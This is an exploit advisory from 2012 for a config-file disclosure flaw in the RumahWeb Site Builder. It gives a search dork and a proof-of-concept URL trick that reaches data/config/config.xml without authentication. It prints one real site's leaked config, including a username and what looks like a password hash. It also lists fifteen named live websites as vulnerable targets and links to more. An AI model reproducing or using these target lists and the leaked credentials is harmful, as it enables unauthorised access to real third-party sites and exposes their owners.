==========================================================================================
Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability
==========================================================================================

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title  : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability
: # Date           : 08 December 2012
: # Author         : X-Cisadane and Xevil (Tomi Zaoldyeck)
: # Vendor         : Rumah Web http://www.rumahweb.com/layanan/sitebuilder
: # Version        : ALL
: # Category       : Web Applications
: # Vulnerability  : Arbitrary Config File Disclosure Vulnerability
: # Tested On      : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English)
: # Greetz to      : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:

DORKS
=====

intext:sitebuilder rumahweb

Proof of Concept
================

[!] site/data/config/config.xml

The site builder stores its configuration file under the web root, where it is served without authentication.

For example, if a Google search for the dork returns

    www.kratontour.com/admin

change the URL to

    www.kratontour.com/data/config/config.xml

-------[ Content of www.kratontour.com/data/config/config.xml ]----------------------

This XML file does not appear to have any style information associated with it. The document tree is shown below.

kratontour.com krato125 8889720046a32ce05e438c17c004af01

-------------------------------------------------------------------------------------

Or, if you got toyohashi-mosque.org/admin, change the URL to toyohashi-mosque.org/data/config/config.xml

Example :

http://11focus.com/data/config/config.xml
http://711pictures.com/data/config/config.xml
http://7oktav.com/data/config/config.xml
http://afindoguesthouse.com/data/config/config.xml
http://alltranss.com/data/config/config.xml
http://altranpumpjaya.com/data/config/config.xml
http://amanahhusada.com/data/config/config.xml
http://anterotour.com/data/config/config.xml
http://ariaribatik.com/data/config/config.xml
http://asthaoilwellservices.com/data/config/config.xml
http://ayalasbutiq.com/data/config/config.xml
http://baccojakarta.com/data/config/config.xml
http://bbayamm.com/data/config/config.xml
http://bibi-laundry.com/data/config/config.xml
http://bimadrillingtools.com/data/config/config.xml

More results? http://pastebin.com/4VZpiC7e